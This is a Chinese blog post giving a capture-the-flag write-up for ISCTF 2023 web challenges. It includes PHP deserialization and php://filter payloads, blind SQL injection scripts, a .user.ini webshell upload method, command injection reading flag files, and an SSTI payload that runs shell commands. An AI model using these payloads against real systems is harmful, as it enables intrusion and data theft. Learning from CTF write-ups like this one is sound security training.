isctf---web

已于 2024-01-31 10:30:58 修改
阅读量491 收藏 8
点赞数 8
文章标签: 前端
于 2024-01-27 21:32:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75317918/article/details/135887283
版权

圣杯战争

php反序列

?payload=O:6:"summon":2:{s:5:"Saber";O:8:"artifact":2:{s:10:"excalibuer";O:7:"prepare":1:{s:7:"release";O:5:"saber":1:{s:6:"weapon";s:52:"php://filter/convert.base64-encode/resource=flag.php";}}s:5:"arrow";N;}s:5:"Rider";N;}

绕进你的心里

解题人:dskjdsodso

import requests
 
url='ttp://43.249.195.138:20367/?hongmeng[]=asd&shennong[]=qsd&zhurong[]=1'
data={
    'pan_gu':'very'*250000+'2023ISCTF'
}
r=requests.post(url=url,data=data).text
print(r)

正则匹配回溯

where_is_the_flag

连接蚁剑,找到两个flag

flag1

flag2

第三个执行命令

env查看环境变量

easy_website

是一个简单的盲注,比较重要的就是限制了or和空格

脚本:

import requests

# payload = "select database()"

# payload =

"selselectect(group_concat(column_name))from(infoorrmation_schema.c olumns)where(table_name='users')"

payload = "selselectect(group_concat('--',passwoorrd))from(users)" payload2 = "0' ||if(ascii(substr(({}),{},1))>{},1,0)#"

url = "http://43.249.195.138:21284/check.php"

flag =""

for i in range(1,200):

high=128

low = 32

mid =(high+low)//2

while(high>low):

payload1 = payload2.format(payload,i,mid)

# print(payload1)

data={

'username':payload1,

'password':'admin'

}

r = requests.post(url=url,data=data)

# print(r.text)

if "admin" in r.text:

low = mid + 1

else:

high = mid

# print(low,high)

mid =(low+high)//2

if chr(mid) == " ":

break

flag += chr(mid)

print(flag)

if chr(mid) == '}':

exit()

ez_ini

上传限制了文件头、 mime类型、文件内容php短标签<?,利用user.ini文件,传输base64编码解析上去,然后再传base64的一句话木马上去

ini文件信息

png图片信息

上传.user.ini即可

wafr

无参数rce,自增,取反,异或方式绕过

post传参

1z_Ssql

直接爆破数据库

爆破结果为:bthcls

user表的password字段

import requests
import sys
import time

url = "http://43.249.195.138:22074/#"
flag = ""
for i in range(1,60):
    max = 127
    min = 32
    while 1:       

        mid = (max+min)>>1
        if(min == mid):
            flag += chr(mid)
            print(flag)
            break
        
        payload = "admin'and (ascii( substr((select(group_concat(password)) from bthcls.users),{},1))<{})#".format(i,mid)


        data = {
            "username":payload,
            "password":0,
        }
        res = requests.post(url = url,data =data)
        time.sleep(0.3)
        if 'You are so smart!' in res.text:
            max = mid
        else:
            min = mid

结果为:we1come7o1sctf

联想一下题目

直接admin/we1come7o1sctf登录

获得flag

webinclude

文件包含

肯定先用dirsearch扫一下目录

发现了flag.php,index.bak

访问index.bak得到

 function string_to_int_array(str){
        const intArr = [];
 
        for(let i=0;i<str.length;i++){
          const charcode = str.charCodeAt(i);
 
          const partA = Math.floor(charcode / 26);
          const partB = charcode % 26;
 
          intArr.push(partA);
          intArr.push(partB);
        }
 
        return intArr;
      }
 
      function int_array_to_text(int_array){
        let txt = '';
 
        for(let i=0;i<int_array.length;i++){
          txt += String.fromCharCode(97 + int_array[i]);
        }
 
        return txt;
      }
 
const hash = int_array_to_text(string_to_int_array(int_array_to_text(string_to_int_array(parameter))));
if(hash === 'dxdydxdudxdtdxeadxekdxea'){
            window.location = 'flag.html';
          }else {
            document.getElementById('fail').style.display = '';
          }

 进行逆向

#include<stdio.h>
#include<string.h>

int main() 
{
	char b[100]="dxdydxdudxdtdxeadxekdxea";
	for(int j=0;j<2;j++){
		int tmp1=0,tmp2=0,sum=0,f=0;
		//printf("%d\n",strlen(b));
		for(int i=0;i<strlen(b);i++){
			int tmp=(int)(b[i]-97);
			f++;
			if(i%2==0){
				tmp1=tmp*26;
				//printf("%d ",tmp1);
			}
			if(i%2!=0){
				tmp2=tmp;
				//printf("%d ",tmp2);
			}
			if(f==2){
				printf("%c",tmp1+tmp2);
				//printf("%d\n",sum);
				sum++;
				tmp1=0;
				tmp2=0;
				f=0;
			}
	}
	//printf("%d",sum);
	}
	return 0;
}

可以得到参数是mihoyo

那么我们构造payload:

?mihoyo=php://filter/read=convert.base64-encode/resource=

base64解密

fuzz!

<?php
/*
Read /flaggggggg.txt
Hint: 你需要学会fuzz,看着键盘一个一个对是没有灵魂的
知识补充:curl命令也可以用来读取文件哦,如curl file:///etc/passwd
*/
error_reporting(0);
header('Content-Type: text/html; charset=utf-8');
highlight_file(__FILE__);
$file = 'file:///etc/passwd';
if(preg_match("/\`|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\\\\|\'|\"|\;|\<|\>|\,|\?|jay/i", $_GET['file'])){
    die('你需要fuzz一下哦~');
}
if(!preg_match("/fi|le|flag/i", $_GET['file'])){
    $file = $_GET['file'];
}
system('curl '.$file);

payload

?file=|tac /fl[a-z]ggggggg.txt

?file=f{i}l{e}:///fla{g}gggggg.txt

恐怖G7

无过滤ssti,直接注入,flag在环境变量里

{{url_for.__globals__['__builtins__']['eval']("__import__('os').popen('env').read()")}}

木…
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ISCTF2021-WriteUp.pdf
10-24
isctf的详细wp
ISCTF-WEB(部分)
BvxiE的博客
12-26 723
过太久了,可以网址都找不到了,凡事不能拖…有天晚上学习完上面的文章,我突然发现一道题出现了一些奇奇怪怪的东西!有趣!康康你能不能发现它?
ISCTF2023-web方向
J1ng_Hong的博客
11-29 1555
进入/flag.php发现里面是空的,再结合题目名字,那么就是include文件包含里的php伪协议读取信息流了。他是include文件包含,我直接尝试了flag.php,发现没东西。这题写的时候,看到了ini,就想到了**.user.ini**开后门,使文本能够执行php命令。然后用oorrder by测出只有一列的数据,那么回显点肯定就是这一列了,所以就正常注入就有了。尝试了好多天,还是做不出来。进题是一个登录界面,这种界面目前我遇到的只有三种可能,一种是爆破,一种是SQL注入,一种是SSTI注入。
ISCTF2023-Misc
k1sme4的博客
11-30 1208
这道题的/etc/sudoers文件上权限了不可读,ls看到/home/ctf目录下有一个可执行文件checkgenshin,于是想到通过写入脚本的方式和可执行文件获取flag。看到一些文件重命名的过程,将原始文件名提出来,考虑到应该就是加密过的flag字符串,诸多尝试无果,最后用libsum库中的n2s()函数解密。根据题目描述,可知数字0、1、2、3、9对应白色像素块,数字4,5,6,7,8对应黑色像素,直接在记事本里都替换成0和1,然后01转二维码。你说爱我替换为Ook.,尊嘟替换为Ook!
ISCTF2023 Web部分题解
m0_74070606的博客
11-30 1304
sql注入题,简单测试后发现可以查表名列名的库全被ban了,但题目给了两个附加,猜测是表名和列名,这题sleep()也没了,可以考虑用布尔盲注,因为当我们输入admin'#的时候页面会有一个hint,虽然这串hint没什么用,但可以用来证明sql语句是对的,下面是布尔盲注脚本。直接post:1=system("ls");解释一下,||的作用是当前面的命令执行失败时,才会执行后面的命令,显然curl||是执行失败的,也就会执行后tac 命令了,[a-z]表示匹配一个从a 到z的字符,L当然也在其中。
ISCTF2022 web wp
m0_60743498的博客
11-24 1058
先传入your name进入下一个判断 P0ST1不等于P0ST2,但是P0ST1等于P0ST2的md5值,这是md5的弱碰撞 GET1过滤了纯数字,用字母绕过,GET2大于678,不能为数字,数组绕过 构造payload: GET: [http://120.79.18.34:20120/?NAME=111&P0ST1=0&P0ST2=s1502113478a](http://120.79.18.34:20120/?NAME=111&P0ST1=0&P0ST2=s1502113478a)
ISCTF2022 WEB题解
qq2642343642的博客
02-09 423
ISCTF2022的web题解
ctf.show web 13-14 writeup
Sk1y的博客
02-19 778
ctf.show web 13-14 writeup web13 解题过程 打开题目如下,应该与文件上传漏洞有关。 当时做的时候,按照常规流程做了一些尝试,尝试上传了php文件,图片马等等,发现后端把php后缀的文件过滤了,同时对文件的大小有一定的限制。 源码泄露: <?php header("content-type:text/html;charset=utf-8"); $filename = $_FILES['file']['name']; $temp_name =
ISCTF 2022 WEB WP分享
starttv的博客
11-04 1622
可以执行代码,进入这里首要要满足,num通过is_numeric的检测,并且不等于36,去空后依然不等于36,经过过滤方法后依然等于36。在进行===比较时,php会先判断两种字符串的类型是否相同,很显然两者都是字符串,第一个判断通过,再进行值的比较,两者是不相等的。2、=== :强等于。php 的 0 与任何字符串比较都为 true,这是不对的,但其实是正确的,因为字符串被强制转换后都成了 0。在进行==比较时,php会自动将字符串转为数字进行值的比较,在这里114512和114512s是相等的。
ctfshow web入门128-132
akxnxbshai的博客
02-28 825
Web 128 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-10 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-12 19:49:05 */ error_reporting(0); include("flag.php"); highlight_file(__FILE__); $f1 = $_GET['f1']
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
vue3.0+antdv的admin管理系统vue-admin-beautiful推荐
独行猫a 的沉淀、积累、总结。天天学习,好好向上...c/c++,嵌入式 linux,Android,HarmonyOS)
05-15 1095
几年前,笔者自学了vue这一优秀的前端框架,但苦于没项目练手,无意间发现了这一优秀的前端集成框架。当时就使用它做了一很有意思的小项目---终端监控云平台,实现了前端和后台的整体功能。整体方案介绍参见博文《》,前端使用vue-admin-beautiful框架,后端使用go-zero微服务框架,几天内就搞出来了一个包含前端和后台的小项目。我的monitor-ui前端运行界面:后续有机会介绍下我这个终端监控云平台小项目的具体实现,挺有意思的。几年前还用到过几个地方的公交客户现场,客户挺喜欢这个功能的。
golang websocket 发送消息莫名其妙断开的问题记录
最新发布
qq_38189542的博客
05-20 73
公司需要做个B/S架构的前端展示项目,当前以为是小case,但是在实现后端功能的时候,还是被坑了。
Unable to start ServletWebServerApplicationContext due to missing ServletWeb
s_sos0的博客
05-14 460
Unable to start ServletWebServerApplicationContext due to missing ServletWeb
综合性练习-验证码
cj13106811623的博客
05-15 815
生成验证码param(参数): 无Return: 图片的内容校验验证码用户输入的验证码5. 代码编写生成验证码://图型验证码写出,可以写出到文件,也可以写出到流try {//返回到浏览器修改前端代码相对应的接口验证成功。
springboot+vue2+elementui实现时间段查询
2301_76604664的博客
05-20 173
前端传来的时间数组,赋值给对应的属性;
vue3专栏项目 -- 五、权限管理(下)
m0_64931189的博客
05-15 816
我们这一系列做的就是,我们刚开始做了message组件,我们可以直接在某个组件中通过即可调用这个message组件,从而展示出这个提示信息框但是我们觉得它可以像以前用过的alert一样,直接通过一个函数调用就可以展示出这个组件,所以有了如下一步步改进:
前端之电力系统SVG图低代码
weixin_38233449的博客
05-14 261
有了线,当然需要面,这时候一个polygon类就可以解决,唯一和polyline不同的是,path最后一个点需要Z闭合。两点一线,只要知道两个点的坐标就可以,但是基础图元可以旋转,也可以闪烁,所以这些属性都需要动态计算。其实所有的图形都是由点,线,面组成的。ployline也是用path就可以了,但是中间的点需要连起来,样式的计算需要循环拼接字符串。两点可以组成线,多点可以组成折线,这就需要一个polyline类去解析每个折线。svg里面的渲染最有难度的大圆弧和小圆弧,需要用到三角函数。
import gmpy2 import libnum from crypto.Util.number import * flag=b'ISCTF{*************}' m=bytes_to_long(flag)
11-24
flag = b'ISCTF{*************}' m = bytes_to_long(flag) # 使用gmpy2模块进行高精度计算 p = gmpy2.next_prime(m) q = gmpy2.next_prime(p) n = p * q # 使用libnum模块进行数字转换 e = libnum.invmod(65537, ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值